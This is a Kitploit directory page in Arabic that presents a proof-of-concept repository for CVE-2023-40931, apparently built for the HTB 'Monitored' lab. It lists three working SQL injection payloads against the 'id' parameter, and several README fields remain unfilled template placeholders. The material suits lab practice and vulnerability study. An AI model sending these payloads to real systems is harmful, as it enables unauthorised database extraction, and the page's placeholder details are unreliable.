Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-40931-POC — CVE-2023-40931 إثبات المفهوم المُعد لـ HTB MONITORED | Kitploit
أدوات/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

CVE-2023-40931 إثبات المفهوم المُعد لـ HTB MONITORED

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) لـ CVE-2023-40931 🚨

يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2023-40931، وهي ثغرة أمنية تم تحديدها في [البرنامج/النظام المتأثر]. الغرض من هذا المستودع هو إظهار الثغرة لأغراض تعليمية وبحثية فقط. 🛠️

إخلاء المسؤولية ⚠️

هذا المشروع مخصص للأغراض التعليمية والاختبار المصرح به فقط. قد يؤدي سوء استخدام هذا الكود إلى عواقب قانونية. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا الكود. احرص دائمًا على الحصول على التصريح المناسب قبل اختبار أي نظام. 🔒

التفاصيل 📋

  • معرف CVE: CVE-2023-40931
  • نوع الثغرة: [نوع الثغرة، مثل تنفيذ الأوامر عن بُعد، تصعيد الامتيازات]
  • البرنامج المتأثر: [اسم وإصدار البرنامج المتأثر]
  • الخطورة: [مستوى الخطورة، مثل حرج، عالي] 🚩

لمزيد من المعلومات، راجع الإدخال الرسمي لـ CVE: CVE-2023-40931. 🔗

الاستخدام 🚀

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    معامل POST 'id' معرض للخطر. الحمولات التالية نجحت في استغلال الثغرة:

    • أعمى قائم على القيم المنطقية (Boolean-based blind): تستخدم هذه الحمولة جملة شرطية لتحديد القيمة المنطقية لاستعلام، مما يسمح باستخراج البيانات من خلال المنطق المنطقي.

      • الحمولة: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • قائم على الأخطاء (Error-based): تستغل هذه الحمولة رسائل خطأ قاعدة البيانات لاستخراج المعلومات عن طريق إثارة أخطاء محددة.

      • الحمولة: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • أعمى قائم على الوقت (Time-based blind): تستخدم هذه الحمولة تأخيرات زمنية لاستنتاج المعلومات من خلال ملاحظة وقت استجابة الخادم.

      • الحمولة: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    تُظهر هذه الحمولات قابلية الثغرة لهجمات حقن SQL. تابع بحذر وتأكد من الحصول على التصريح المناسب قبل الاختبار. 🔒

  2. اتبع التعليمات الموجودة في ملف exploit.py لتنفيذ إثبات المفهوم. 🧑‍💻

    ملاحظة: تأكد من تثبيت التبعيات المطلوبة. ✅

تنزيل الأداة